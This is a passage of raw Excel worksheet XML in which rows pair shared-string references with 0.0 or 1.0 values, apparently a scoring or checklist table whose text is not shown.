      </c>
      <c r="K16" s="34">
        <v>0.0</v>
      </c>
      <c r="L16" s="34" t="s">
        <v>302</v>
      </c>
      <c r="M16" s="34">
        <v>1.0</v>
      </c>
      <c r="N16" s="36"/>
    </row>
    <row r="17" ht="15.75" customHeight="1">
      <c r="A17" s="40"/>
      <c r="B17" s="42"/>
      <c r="C17" s="34"/>
      <c r="D17" s="34"/>
      <c r="E17" s="34"/>
      <c r="F17" s="34"/>
      <c r="G17" s="34"/>
      <c r="H17" s="34"/>
      <c r="I17" s="34"/>
      <c r="J17" s="34"/>
      <c r="K17" s="34"/>
      <c r="L17" s="34"/>
      <c r="M17" s="34"/>
      <c r="N17" s="40"/>
    </row>
    <row r="18" ht="15.75" customHeight="1">
      <c r="A18" s="36" t="s">
        <v>303</v>
      </c>
      <c r="B18" s="34" t="s">
        <v>270</v>
      </c>
      <c r="C18" s="34">
        <v>1.0</v>
      </c>
      <c r="D18" s="34" t="s">
        <v>304</v>
      </c>
      <c r="E18" s="34">
        <v>1.0</v>
      </c>
      <c r="F18" s="34" t="s">
        <v>305</v>
      </c>
      <c r="G18" s="34">
        <v>1.0</v>
      </c>
      <c r="H18" s="34">
        <v>0.0</v>
      </c>
      <c r="I18" s="34" t="s">
        <v>306</v>
      </c>
      <c r="J18" s="34">
        <v>1.0</v>
      </c>
      <c r="K18" s="34">
        <v>0.0</v>
      </c>
      <c r="L18" s="34" t="s">
        <v>307</v>
      </c>
      <c r="M18" s="34">
        <v>1.0</v>
      </c>
      <c r="N18" s="36"/>
    </row>
    <row r="19" ht="15.75" customHeight="1">
      <c r="A19" s="40"/>
      <c r="B19" s="42"/>
      <c r="C19" s="34"/>
      <c r="D19" s="34"/>
      <c r="E19" s="34"/>
      <c r="F19" s="34"/>
      <c r="G19" s="34"/>
      <c r="H19" s="34"/>
      <c r="I19" s="34"/>
      <c r="J19" s="34"/>
      <c r="K19" s="34"/>
      <c r="L19" s="34"/>
      <c r="M19" s="34"/>
      <c r="N19" s="40"/>
    </row>
    <row r="20" ht="15.75" customHeight="1">
      <c r="A20" s="36" t="s">
        <v>308</v>
      </c>
      <c r="B20" s="34" t="s">
        <v>298</v>
      </c>
      <c r="C20" s="34">
        <v>1.0</v>
      </c>
      <c r="D20" s="34" t="s">
        <v>309</v>
      </c>
      <c r="E20" s="34">
        <v>1.0</v>
      </c>
      <c r="F20" s="34" t="s">
        <v>310</v>
      </c>
      <c r="G20" s="34">
        <v>1.0</v>
      </c>
      <c r="H20" s="34">
        <v>0.0</v>
      </c>
      <c r="I20" s="4" t="s">
        <v>311</v>
      </c>
      <c r="J20" s="34">
        <v>1.0</v>
      </c>
      <c r="K20" s="34">
        <v>0.0</v>
      </c>
      <c r="L20" s="34" t="s">
        <v>312</v>
      </c>
      <c r="M20" s="34">
        <v>1.0</v>
      </c>
      <c r="N20" s="36"/>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="40"/>
      <c r="B21" s="42"/>
      <c r="C21" s="34"/>
      <c r="D21" s="34"/>
      <c r="E21" s="34"/>
      <c r="F21" s="34"/>
      <c r="G21" s="34"/>
      <c r="H21" s="34"/>
      <c r="I21" s="34"/>
      <c r="J21" s="34"/>
      <c r="K21" s="34"/>
      <c r="L21" s="34"/>
      <c r="M21" s="34"/>
      <c r="N21" s="40"/>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="36" t="s">
        <v>313</v>
      </c>
      <c r="B22" s="34" t="s">
        <v>314</v>
      </c>
      <c r="C22" s="34">
        <v>1.0</v>
      </c>
      <c r="D22" s="34" t="s">
        <v>315</v>
      </c>
      <c r="E22" s="34">
        <v>1.0</v>
      </c>
      <c r="F22" s="34" t="s">
        <v>316</v>
      </c>
      <c r="G22" s="34">
        <v>1.0</v>
      </c>
      <c r="H22" s="34">
        <v>0.0</v>
      </c>
      <c r="I22" s="34" t="s">
        <v>317</v>
      </c>
      <c r="J22" s="34">
        <v>1.0</v>
      </c>
      <c r="K22" s="34">
        <v>0.0</v>
      </c>
      <c r="L22" s="34" t="s">
        <v>318</v>
      </c>
      <c r="M22" s="34">
        <v>1.0</v>
      </c>
      <c r="N22" s="36"/>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="40"/>
      <c r="B23" s="42"/>
      <c r="C23" s="34"/>
      <c r="D23" s="34"/>
      <c r="E23" s="34"/>
      <c r="F23" s="34"/>
      <c r="G23" s="34"/>
      <c r="H23" s="34"/>
      <c r="I23" s="34"/>
      <c r="J23" s="34"/>
      <c r="K23" s="34"/>
      <c r="L23" s="34"/>
      <c r="M23" s="34"/>
      <c r="N23" s="40"/>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="A24" s="36" t="s">
        <v>319</v>
      </c>
      <c r="B24" s="34" t="s">
        <v>320</v>
      </c>
      <c r="C24" s="34">
        <v>1.0</v>
      </c>
      <c r="D24" s="34" t="s">
        <v>321</v>
      </c>
      <c r="E24" s="34">
        <v>1.0</v>
      </c>
      <c r="F24" s="34" t="s">
        <v>322</v>
      </c>
      <c r="G24" s="34">
        <v>1.0</v>
      </c>
      <c r="H24" s="34">
        <v>0.0</v>
      </c>
      <c r="I24" s="34" t="s">
        <v>323</v>
      </c>
      <c r="J24" s="34">
        <v>1.0</v>
      </c>
      <c r="K24" s="34">
        <v>0.0</v>
      </c>
      <c r="L24" s="34" t="s">
        <v>324</v>
      </c>
      <c r="M24" s="34">
        <v>1.0</v>
      </c>
      <c r="N24" s="36"/>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="A25" s="40"/>
      <c r="B25" s="42"/>
      <c r="C25" s="34"/>
      <c r="D25" s="34"/>
      <c r="E25" s="34"/>
      <c r="F25" s="34"/>
      <c r="G25" s="34"/>
      <c r="H25" s="34"/>
      <c r="I25" s="34"/>
      <c r="J25" s="34"/>
      <c r="K25" s="34"/>
      <c r="L25" s="34"/>
      <c r="M25" s="34"/>
      <c r="N25" s="40"/>
    </row>
    <row r="26" ht="15.75" customHeight="1">
      <c r="A26" s="36" t="s">
        <v>325</v>
      </c>
      <c r="B26" s="34" t="s">
        <v>326</v>
      </c>
      <c r="C26" s="34">
        <v>0.0</v>
      </c>
      <c r="D26" s="34" t="s">
        <v>327</v>
      </c>
      <c r="E26" s="34">
        <v>1.0</v>
      </c>
      <c r="F26" s="34" t="s">
        <v>328</v>
      </c>
      <c r="G26" s="34">
        <v>0.0</v>
      </c>
      <c r="H26" s="34">
        <v>1.0</v>
      </c>
      <c r="I26" s="34" t="s">
        <v>329</v>
      </c>
      <c r="J26" s="34">
        <v>1.0</v>
      </c>
      <c r="K26" s="34">
        <v>0.0</v>
      </c>
      <c r="L26" s="34" t="s">
        <v>330</v>
      </c>
      <c r="M26" s="34">
        <v>1.0</v>
      </c>
      <c r="N26" s="36"/>
    </row>
    <row r="27" ht="15.75" customHeight="1">
      <c r="A27" s="40"/>
      <c r="B27" s="42"/>
      <c r="C27" s="34"/>
      <c r="D27" s="34"/>
      <c r="E27" s="34"/>
      <c r="F27" s="34"/>
      <c r="G27" s="34"/>
      <c r="H27" s="34"/>
      <c r="I27" s="34"/>
      <c r="J27" s="34"/>
      <c r="K27" s="34"/>
      <c r="L27" s="34"/>
      <c r="M27" s="34"/>
      <c r="N27" s="40"/>
    </row>
    <row r="28" ht="15.75" customHeight="1">
      <c r="A28" s="36" t="s">
        <v>331</v>
      </c>
      <c r="B28" s="34" t="s">
        <v>332</v>
      </c>
      <c r="C28" s="34">
        <v>0.0</v>
      </c>
      <c r="D28" s="34" t="s">
        <v>333</v>
      </c>
      <c r="E28" s="34">
        <v>1.0</v>
      </c>
      <c r="F28" s="34" t="s">
        <v>334</v>
      </c>
      <c r="G28" s="34">
        <v>0.0</v>
      </c>
      <c r="H28" s="34">
        <v>0.0</v>
      </c>
      <c r="I28" s="34" t="s">
        <v>335</v>
      </c>
      <c r="J28" s="34">
        <v>1.0</v>
      </c>
      <c r="K28" s="34">
        <v>0.0</v>
      </c>
      <c r="L28" s="34" t="s">
        <v>336</v>
      </c>
      <c r="M28" s="34">
        <v>1.0</v>
      </c>
      <c r="N28" s="36"/>
    </row>
    <row r="29" ht="15.75" customHeight="1">
      <c r="A29" s="40"/>
      <c r="B29" s="42"/>
      <c r="C29" s="34"/>
      <c r="D29" s="34"/>
      <c r="E29" s="34"/>
      <c r="F29" s="34"/>
      <c r="G29" s="34"/>
      <c r="H29" s="34"/>
      <c r="I29" s="34"/>
      <c r="J29" s="34"/>
      <c r="K29" s="34"/>
      <c r="L29" s="34"/>
      <c r="M29" s="34"/>
      <c r="N29" s="40"/>
    </row>
    <row r="30" ht="15.75" customHeight="1">
      <c r="A30" s="36" t="s">
        <v>337</v>
      </c>
      <c r="B30" s="34" t="s">
        <v>264</v>
      </c>
      <c r="C30" s="34">
        <v>1.0</v>
      </c>
      <c r="D30" s="34" t="s">
        <v>338</v>
      </c>
      <c r="E30" s="34">
        <v>1.0</v>
      </c>
      <c r="F30" s="34" t="s">
        <v>339</v>
      </c>
      <c r="G30" s="34">
        <v>1.0</v>
      </c>
      <c r="H30" s="34">
        <v>0.0</v>
      </c>
      <c r="I30" s="34" t="s">
        <v>340</v>
      </c>
      <c r="J30" s="34">
        <v>1.0</v>
      </c>
      <c r="K30" s="34">
        <v>0.0</v>
      </c>
      <c r="L30" s="34" t="s">
        <v>341</v>
      </c>
      <c r="M30" s="34">
        <v>1.0</v>
      </c>
      <c r="N30" s="36"/>
    </row>
    <row r="31" ht="15.75" customHeight="1">
      <c r="A31" s="40"/>
      <c r="B31" s="42"/>
      <c r="C31" s="34"/>
      <c r="D31" s="34"/>
      <c r="E31" s="34"/>
      <c r="F31" s="34"/>
      <c r="G31" s="34"/>
      <c r="H31" s="34"/>
      <c r="I31" s="34"/>
      <c r="J31" s="34"/>
      <c r="K31" s="34"/>
      <c r="L31" s="34"/>
      <c r="M31" s="34"/>
      <c r="N31" s="40"/>
    </row>
    <row r="32" ht="15.75" customHeight="1">
      <c r="A32" s="36" t="s">
        <v>342</v>
      </c>
      <c r="B32" s="34" t="s">
        <v>314</v>
      </c>
      <c r="C32" s="34">
        <v>0.0</v>
      </c>
      <c r="D32" s="34" t="s">
        <v>343</v>
      </c>
      <c r="E32" s="34">
        <v>1.0</v>
      </c>
      <c r="F32" s="34" t="s">
        <v>344</v>
      </c>
      <c r="G32" s="34">
        <v>0.0</v>
      </c>
      <c r="H32" s="34">
        <v>0.0</v>
      </c>
      <c r="I32" s="34" t="s">
        <v>345</v>
      </c>
      <c r="J32" s="34">
        <v>1.0</v>
      </c>
      <c r="K32" s="34">
        <v>0.0</v>
      </c>
      <c r="L32" s="34" t="s">
        <v>346</v>
      </c>
      <c r="M32" s="34">
        <v>1.0</v>
      </c>
      <c r="N32" s="36"/>
    </row>
    <row r="33" ht="15.75" customHeight="1">
      <c r="A33" s="40"/>
      <c r="B33" s="42"/>
      <c r="C33" s="34"/>
      <c r="D33" s="34"/>
      <c r="E33" s="34"/>
      <c r="F33" s="34"/>
      <c r="G33" s="34"/>
      <c r="H33" s="34"/>
      <c r="I33" s="34"/>
      <c r="J33" s="34"/>
      <c r="K33" s="34"/>
      <c r="L33" s="34"/>
      <c r="M33" s="34"/>
      <c r="N33" s="40"/>
    </row>
    <row r="34" ht="15.75" customHeight="1">
      <c r="A34" s="36" t="s">
        <v>347</v>
      </c>
      <c r="B34" s="34" t="s">
        <v>348</v>
      </c>
      <c r="C34" s="34">
        <v>0.0</v>
      </c>
      <c r="D34" s="34" t="s">
        <v>349</v>
      </c>
      <c r="E34" s="34">
        <v>1.0</v>
      </c>
      <c r="F34" s="34" t="s">
        <v>350</v>
      </c>
      <c r="G34" s="34">
        <v>1.0</v>
      </c>
      <c r="H34" s="34">
        <v>0.0</v>
      </c>
      <c r="I34" s="34" t="s">
        <v>351</v>
      </c>
      <c r="J34" s="34">
        <v>1.0</v>
      </c>
      <c r="K34" s="34">
        <v>0.0</v>
      </c>
      <c r="L34" s="34" t="s">
        <v>352</v>
      </c>
      <c r="M34" s="34">
        <v>1.0</v>
      </c>
      <c r="N34" s="36"/>
    </row>
    <row r="35" ht="15.75" customHeight="1">
      <c r="A35" s="40"/>
      <c r="B35" s="42"/>
      <c r="C35" s="34"/>
      <c r="D35" s="34"/>
      <c r="E35" s="34"/>
      <c r="F35" s="34"/>
      <c r="G35" s="34"/>
      <c r="H35" s="34"/>
      <c r="I35" s="34"/>
      <c r="J35" s="34"/>
      <c r="K35" s="34"/>
      <c r="L35" s="34"/>
      <c r="M35" s="34"/>
      <c r="N35" s="40"/>
    </row>
    <row r="36" ht="15.75" customHeight="1">
      <c r="A36" s="36" t="s">
        <v>353</v>
      </c>
      <c r="B36" s="34" t="s">
        <v>314</v>
      </c>
      <c r="C36" s="34">
        <v>0.0</v>
      </c>
      <c r="D36" s="34" t="s">
        <v>354</v>
      </c>
      <c r="E36" s="34">
        <v>1.0</v>
      </c>
      <c r="F36" s="34" t="s">
        <v>355</v>
      </c>
      <c r="G36" s="34">
        <v>0.0</v>
      </c>
      <c r="H36" s="34">
        <v>0.0</v>
      </c>
      <c r="I36" s="34" t="s">
        <v>356</v>
      </c>
      <c r="J36" s="34">
        <v>1.0</v>
      </c>
      <c r="K36" s="34">
        <v>0.0</v>
      </c>
      <c r="L36" s="34" t="s">
        <v>357</v>
      </c>
      <c r="M36" s="34">
        <v>1.0</v>
      </c>
      <c r="N36" s="36"/>
    </row>
    <row r="37" ht="15.75" customHeight="1">
      <c r="A37" s="40"/>
      <c r="B37" s="42"/>
      <c r="C37" s="34"/>
      <c r="D37" s="34"/>
      <c r="E37" s="34"/>
      <c r="F37" s="34"/>
      <c r="G37" s="34"/>
      <c r="H37" s="34"/>
      <c r="I37" s="34"/>
      <c r="J37" s="34"/>
      <c r="K37" s="34"/>
      <c r="L37" s="34"/>
      <c r="M37" s="34"/>
      <c r="N37" s="40"/>
    </row>
    <row r="38" ht="15.75" customHeight="1">
      <c r="A38" s="36" t="s">
        <v>358</v>
      </c>
      <c r="B38" s="34" t="s">
        <v>298</v>
      </c>
      <c r="C38" s="34">
        <v>0.0</v>
      </c>
      <c r="D38" s="34" t="s">
        <v>359</v>
      </c>
      <c r="E38" s="43">
        <v>1.0</v>
      </c>
      <c r="F38" s="34" t="s">
        <v>360</v>
      </c>
      <c r="G38" s="34">
        <v>1.0</v>
      </c>
      <c r="H38" s="34">
        <v>0.0</v>
      </c>
      <c r="I38" s="34" t="s">
        <v>361</v>
      </c>
      <c r="J38" s="34">
        <v>1.0</v>
      </c>
      <c r="K38" s="34">
        <v>0.0</v>
      </c>
      <c r="L38" s="43" t="s">
        <v>362</v>
      </c>
      <c r="M38" s="34">
        <v>1.0</v>
      </c>
      <c r="N38" s="36"/>
    </row>
    <row r="39" ht="15.75" customHeight="1">
      <c r="A39" s="40"/>
      <c r="B39" s="42"/>
      <c r="C39" s="34"/>
      <c r="D39" s="34"/>
      <c r="E39" s="34"/>
      <c r="F39" s="34"/>
      <c r="G39" s="34"/>
      <c r="H39" s="34"/>
      <c r="I39" s="34"/>
      <c r="J39" s="34"/>
      <c r="K39" s="34"/>
      <c r="L39" s="34"/>
      <c r="M39" s="34"/>
      <c r="N39" s="40"/>
    </row>
    <row r="40" ht="15.75" customHeight="1">
      <c r="A40" s="36" t="s">
        <v>363</v>
      </c>
      <c r="B40" s="34" t="s">
        <v>298</v>
      </c>
      <c r="C40" s="34">
        <v>1.0</v>
      </c>
      <c r="D40" s="34" t="s">
        <v>364</v>
      </c>
      <c r="E40" s="34">
        <v>1.0</v>
      </c>
      <c r="F40" s="38" t="s">
        <v>365</v>
      </c>
      <c r="G40" s="34">
        <v>1.0</v>
      </c>
      <c r="H40" s="34">
        <v>0.0</v>
      </c>
      <c r="I40" s="34" t="s">
        <v>366</v>
      </c>
      <c r="J40" s="34">
        <v>1.0</v>
      </c>
      <c r="K40" s="34">
        <v>0.0</v>
      </c>
      <c r="L40" s="34" t="s">
        <v>367</v>
      </c>
      <c r="M40" s="34">
        <v>1.0</v>
      </c>
      <c r="N40" s="36"/>
    </row>
    <row r="41" ht="15.75" customHeight="1">
      <c r="A41" s="40"/>
      <c r="B41" s="42"/>
      <c r="C41" s="34"/>
      <c r="D41" s="34"/>
      <c r="E41" s="34"/>
      <c r="F41" s="34"/>
      <c r="G41" s="34"/>
      <c r="H41" s="34"/>
      <c r="I41" s="34"/>
      <c r="J41" s="34"/>
      <c r="K41" s="34"/>
      <c r="L41" s="34"/>
      <c r="M41" s="34"/>
      <c r="N41" s="40"/>
    </row>
    <row r="42" ht="15.75" customHeight="1">
      <c r="A42" s="36" t="s">
        <v>368</v>
      </c>
      <c r="B42" s="34" t="s">
        <v>298</v>
      </c>
      <c r="C42" s="34">
        <v>1.0</v>
      </c>
      <c r="D42" s="34" t="s">
        <v>369</v>
      </c>
      <c r="E42" s="34">
        <v>1.0</v>
      </c>
      <c r="F42" s="38" t="s">
        <v>370</v>
      </c>
      <c r="G42" s="34">
        <v>0.0</v>
      </c>
      <c r="H42" s="34">
        <v>0.0</v>
      </c>
      <c r="I42" s="34" t="s">
        <v>371</v>
      </c>
      <c r="J42" s="34">
        <v>1.0</v>
      </c>
      <c r="K42" s="34">
        <v>0.0</v>
      </c>
      <c r="L42" s="34" t="s">
        <v>372</v>
      </c>
      <c r="M42" s="34">
        <v>1.0</v>
      </c>
      <c r="N42" s="36"/>
    </row>
    <row r="43" ht="15.75" customHeight="1">
      <c r="A43" s="40"/>
      <c r="B43" s="42"/>
      <c r="C43" s="34"/>
      <c r="D43" s="34"/>
      <c r="E43" s="34"/>
      <c r="F43" s="34"/>
      <c r="G43" s="34"/>
      <c r="H43" s="34"/>
      <c r="I43" s="34"/>
      <c r="J43" s="34"/>
      <c r="K43" s="34"/>
      <c r="L43" s="34"/>
      <c r="M43" s="34"/>
      <c r="N43" s="40"/>
    </row>
    <row r="44" ht="15.75" customHeight="1">
      <c r="A44" s="36" t="s">
        <v>373</v>
      </c>
      <c r="B44" s="34" t="s">
        <v>374</v>
      </c>
      <c r="C44" s="34">
        <v>1.0</v>
      </c>
      <c r="D44" s="34" t="s">
        <v>375</v>
      </c>
      <c r="E44" s="34">
        <v>1.0</v>
      </c>
      <c r="F44" s="34" t="s">
        <v>376</v>
      </c>
      <c r="G44" s="34">
        <v>1.0</v>
      </c>
      <c r="H44" s="34">
        <v>0.0</v>
      </c>
      <c r="I44" s="34" t="s">
        <v>377</v>
      </c>
      <c r="J44" s="34">
        <v>1.0</v>
      </c>
      <c r="K44" s="34">
        <v>0.0</v>
      </c>
      <c r="L44" s="34" t="s">
        <v>378</v>
      </c>
      <c r="M44" s="34">
        <v>1.0</v>
      </c>
      <c r="N44" s="36"/>
    </row>
    <row r="45" ht="15.75" customHeight="1">
      <c r="A45" s="40"/>
      <c r="B45" s="42"/>
      <c r="C45" s="34"/>
      <c r="D45" s="34"/>
      <c r="E45" s="34"/>
      <c r="F45" s="34"/>
      <c r="G45" s="34"/>
      <c r="H45" s="34"/>
      <c r="I45" s="34"/>
      <c r="J45" s="34"/>
      <c r="K45" s="34"/>
      <c r="L45" s="34"/>
      <c r="M45" s="34"/>
      <c r="N45" s="40"/>
    </row>
    <row r="46" ht="15.75" customHeight="1">
      <c r="A46" s="40"/>
      <c r="B46" s="34" t="s">
        <v>379</v>
      </c>
      <c r="C46" s="34">
        <v>1.0</v>
      </c>
      <c r="D46" s="34" t="s">
        <v>380</v>
      </c>
      <c r="E46" s="34">
        <v>1.0</v>
      </c>
      <c r="F46" s="38" t="s">
        <v>381</v>
      </c>
      <c r="G46" s="34">
        <v>1.0</v>
      </c>
      <c r="H46" s="34">
        <v>0.0</v>
      </c>
      <c r="I46" s="34" t="s">
        <v>382</v>
      </c>
      <c r="J46" s="34">
        <v>1.0</v>
      </c>
      <c r="K46" s="34">
        <v>0.0</v>
      </c>
      <c r="L46" s="34" t="s">
        <v>383</v>
      </c>
      <c r="M46" s="34">
        <v>1.0</v>
      </c>
      <c r="N46" s="40"/>
    </row>
    <row r="47" ht="15.75" customHeight="1">
      <c r="A47" s="40"/>
      <c r="B47" s="42"/>
      <c r="C47" s="34"/>
      <c r="D47" s="34"/>
      <c r="E47" s="34"/>
      <c r="F47" s="42"/>
      <c r="G47" s="34"/>
      <c r="H47" s="34"/>
      <c r="I47" s="34"/>
      <c r="J47" s="34"/>
      <c r="K47" s="34"/>
      <c r="L47" s="34"/>
      <c r="M47" s="34"/>
      <c r="N47" s="40"/>
    </row>
    <row r="48" ht="15.75" customHeight="1">
      <c r="A48" s="36" t="s">
        <v>384</v>
      </c>
      <c r="B48" s="42"/>
      <c r="C48" s="34"/>
      <c r="D48" s="34"/>
      <c r="E48" s="34"/>
      <c r="F48" s="42"/>
      <c r="G48" s="34"/>
      <c r="H48" s="34"/>
      <c r="I48" s="34"/>
      <c r="J48" s="34"/>
      <c r="K48" s="34"/>
      <c r="L48" s="34"/>
      <c r="M48" s="34"/>
      <c r="N48" s="36"/>
    </row>
    <row r="49" ht="15.75" customHeight="1">
      <c r="A49" s="40"/>
      <c r="B49" s="42"/>
      <c r="C49" s="34"/>
      <c r="D49" s="34"/>
      <c r="E49" s="34"/>
      <c r="F49" s="42"/>
      <c r="G49" s="34"/>
      <c r="H49" s="34"/>
      <c r="I49" s="34"/>
      <c r="J49" s="34"/>
      <c r="K49" s="34"/>
      <c r="L49" s="34"/>
      <c r="M49" s="34"/>
      <c r="N49" s="40"/>
    </row>
    <row r="50" ht="15.75" customHeight="1">
      <c r="A50" s="36" t="s">
        <v>385</v>
      </c>
      <c r="B50" s="34" t="s">
        <v>386</v>
      </c>
      <c r="C50" s="34">
        <v>1.0</v>
      </c>
      <c r="D50" s="34" t="s">
        <v>387</v>
      </c>
      <c r="E50" s="34">
        <v>1.0</v>
      </c>
      <c r="F50" s="34" t="s">
        <v>388</v>
      </c>
      <c r="G50" s="34">
        <v>1.0</v>
      </c>
      <c r="H50" s="34">
        <v>0.0</v>
      </c>
      <c r="I50" s="34" t="s">
        <v>389</v>
      </c>
      <c r="J50" s="34">
        <v>1.0</v>
      </c>
      <c r="K50" s="34">
        <v>0.0</v>
      </c>
      <c r="L50" s="34" t="s">
        <v>390</v>
      </c>
      <c r="M50" s="34">
        <v>1.0</v>
      </c>
      <c r="N50" s="36"/>
    </row>
    <row r="51" ht="15.75" customHeight="1">
      <c r="A51" s="40"/>
      <c r="B51" s="42"/>
      <c r="C51" s="34"/>
      <c r="D51" s="34"/>
      <c r="E51" s="34"/>
      <c r="F51" s="34"/>
      <c r="G51" s="34"/>
      <c r="H51" s="34"/>
      <c r="I51" s="34"/>
      <c r="J51" s="34"/>
      <c r="K51" s="34"/>
      <c r="L51" s="34"/>
      <c r="M51" s="34"/>
      <c r="N51" s="40"/>
    </row>
    <row r="52" ht="15.75" customHeight="1">
      <c r="A52" s="36" t="s">
        <v>391</v>
      </c>
      <c r="B52" s="34" t="s">
        <v>392</v>
      </c>
      <c r="C52" s="34">
        <v>1.0</v>
      </c>
      <c r="D52" s="34" t="s">
        <v>393</v>
      </c>
      <c r="E52" s="34">
        <v>1.0</v>
      </c>
      <c r="F52" s="34" t="s">
        <v>394</v>
      </c>
      <c r="G52" s="34">
        <v>1.0</v>
      </c>
      <c r="H52" s="34">
        <v>0.0</v>
      </c>
      <c r="I52" s="34" t="s">
        <v>395</v>
      </c>
      <c r="J52" s="34">
        <v>1.0</v>
      </c>
      <c r="K52" s="34">
        <v>0.0</v>
      </c>
      <c r="L52" s="34" t="s">
        <v>396</v>
      </c>
      <c r="M52" s="34">
        <v>1.0</v>
      </c>
      <c r="N52" s="36"/>
    </row>
    <row r="53" ht="15.75" customHeight="1">
      <c r="A53" s="40"/>
      <c r="B53" s="42"/>
      <c r="C53" s="34"/>
      <c r="D53" s="34"/>
      <c r="E53" s="34"/>
      <c r="F53" s="34"/>
      <c r="G53" s="34"/>
      <c r="H53" s="34"/>
      <c r="I53" s="34"/>
      <c r="J53" s="34"/>
      <c r="K53" s="34"/>
      <c r="L53" s="34"/>
      <c r="M53" s="34"/>
      <c r="N53" s="40"/>
    </row>
    <row r="54" ht="15.75" customHeight="1">
      <c r="A54" s="36" t="s">
        <v>397</v>
      </c>
      <c r="B54" s="34" t="s">
        <v>398</v>
      </c>
      <c r="C54" s="34">
        <v>0.0</v>
      </c>
      <c r="D54" s="34" t="s">
        <v>399</v>
      </c>
      <c r="E54" s="34">
        <v>1.0</v>
      </c>
      <c r="F54" s="34" t="s">
        <v>400</v>
      </c>
      <c r="G54" s="34">
        <v>1.0</v>
      </c>
      <c r="H54" s="34">
        <v>0.0</v>
      </c>
      <c r="I54" s="34" t="s">
        <v>401</v>
      </c>
      <c r="J54" s="34">
        <v>1.0</v>
      </c>
      <c r="K54" s="34">
        <v>0.0</v>
      </c>
      <c r="L54" s="34" t="s">
        <v>402</v>
      </c>
      <c r="M54" s="34">
        <v>1.0</v>
      </c>
      <c r="N54" s="36"/>
    </row>
    <row r="55" ht="15.75" customHeight="1">
      <c r="A55" s="40"/>
      <c r="B55" s="42"/>
      <c r="C55" s="34"/>
      <c r="D55" s="34"/>
      <c r="E55" s="34"/>
      <c r="F55" s="34"/>
      <c r="G55" s="34"/>
      <c r="H55" s="34"/>
      <c r="I55" s="34"/>
      <c r="J55" s="34"/>
      <c r="K55" s="34"/>
      <c r="L55" s="34"/>
      <c r="M55" s="34"/>
      <c r="N55" s="40"/>
    </row>
    <row r="56" ht="15.75" customHeight="1">
      <c r="A56" s="36" t="s">
        <v>403</v>
      </c>
      <c r="B56" s="34" t="s">
        <v>404</v>
      </c>
      <c r="C56" s="34">
        <v>1.0</v>
      </c>
      <c r="D56" s="34" t="s">
        <v>405</v>
      </c>
      <c r="E56" s="34">
        <v>1.0</v>
      </c>
      <c r="F56" s="34" t="s">
        <v>406</v>
      </c>
      <c r="G56" s="34">
        <v>1.0</v>
      </c>
      <c r="H56" s="34">
        <v>0.0</v>
      </c>
      <c r="I56" s="34" t="s">
        <v>407</v>
      </c>
      <c r="J56" s="34">
        <v>1.0</v>
      </c>
      <c r="K56" s="34">
        <v>0.0</v>
      </c>
      <c r="L56" s="34" t="s">
        <v>408</v>
      </c>
      <c r="M56" s="34">
        <v>1.0</v>
      </c>
      <c r="N56" s="36"/>
    </row>
    <row r="57" ht="15.75" customHeight="1">
      <c r="A57" s="40"/>
      <c r="B57" s="42"/>
      <c r="C57" s="34"/>
      <c r="D57" s="34"/>
      <c r="E57" s="34"/>
      <c r="F57" s="34"/>
      <c r="G57" s="34"/>
      <c r="H57" s="34"/>
      <c r="I57" s="34"/>
      <c r="J57" s="34"/>
      <c r="K57" s="34"/>
      <c r="L57" s="34"/>
      <c r="M57" s="34"/>
      <c r="N57" s="40"/>
    </row>
    <row r="58" ht="15.75" customHeight="1">
      <c r="A58" s="36" t="s">
        <v>409</v>
      </c>
      <c r="B58" s="34" t="s">
        <v>410</v>
      </c>
      <c r="C58" s="34">
        <v>1.0</v>
      </c>
      <c r="D58" s="34" t="s">
        <v>406</v>
      </c>
      <c r="E58" s="34">
        <v>1.0</v>
      </c>
      <c r="F58" s="34" t="s">
        <v>411</v>
      </c>
      <c r="G58" s="34">
        <v>1.0</v>
      </c>
      <c r="H58" s="34">
        <v>0.0</v>
      </c>
      <c r="I58" s="34" t="s">
        <v>412</v>
      </c>
      <c r="J58" s="34">
        <v>1.0</v>
      </c>
      <c r="K58" s="34">
        <v>0.0</v>
      </c>
      <c r="L58" s="34" t="s">
        <v>413</v>
      </c>
      <c r="M58" s="34">
        <v>1.0</v>
      </c>
      <c r="N58" s="36"/>
    </row>
    <row r="59" ht="15.75" customHeight="1">
      <c r="A59" s="40"/>
      <c r="B59" s="42"/>
      <c r="C59" s="34"/>
      <c r="D59" s="34"/>
      <c r="E59" s="34"/>
      <c r="F59" s="34"/>
      <c r="G59" s="34"/>
      <c r="H59" s="34"/>
      <c r="I59" s="34"/>
      <c r="J59" s="34"/>
      <c r="K59" s="34"/>
      <c r="L59" s="34"/>
      <c r="M59" s="34"/>
      <c r="N59" s="40"/>
    </row>
    <row r="60" ht="15.75" customHeight="1">
      <c r="A60" s="36" t="s">
        <v>414</v>
      </c>
      <c r="B60" s="34" t="s">
        <v>415</v>
      </c>
      <c r="C60" s="34">
        <v>1.0</v>
      </c>
      <c r="D60" s="34" t="s">
        <v>416</v>
      </c>
      <c r="E60" s="34">
        <v>1.0</v>
      </c>
      <c r="F60" s="34" t="s">
        <v>417</v>
      </c>
      <c r="G60" s="34">
        <v>1.0</v>
      </c>
      <c r="H60" s="34">
        <v>0.0</v>
      </c>
      <c r="I60" s="34" t="s">
        <v>418</v>
      </c>
      <c r="J60" s="34">
        <v>1.0</v>
      </c>
      <c r="K60" s="34">
        <v>0.0</v>
      </c>
      <c r="L60" s="34" t="s">
        <v>413</v>
      </c>
      <c r="M60" s="34">
        <v>1.0</v>
      </c>
      <c r="N60" s="36"/>
    </row>
    <row r="61" ht="15.75" customHeight="1">
      <c r="A61" s="40"/>
      <c r="B61" s="42"/>
      <c r="C61" s="34"/>
      <c r="D61" s="34"/>
      <c r="E61" s="34"/>
      <c r="F61" s="34"/>
      <c r="G61" s="34"/>
      <c r="H61" s="34"/>
      <c r="I61" s="34"/>
      <c r="J61" s="34"/>
      <c r="K61" s="34"/>
      <c r="L61" s="34"/>
      <c r="M61" s="34"/>
      <c r="N61" s="40"/>
    </row>
    <row r="62" ht="15.75" customHeight="1">
      <c r="A62" s="36" t="s">
        <v>419</v>
      </c>
      <c r="B62" s="34" t="s">
        <v>420</v>
      </c>
      <c r="C62" s="34">
        <v>1.0</v>
      </c>
      <c r="D62" s="34" t="s">
        <v>421</v>
      </c>
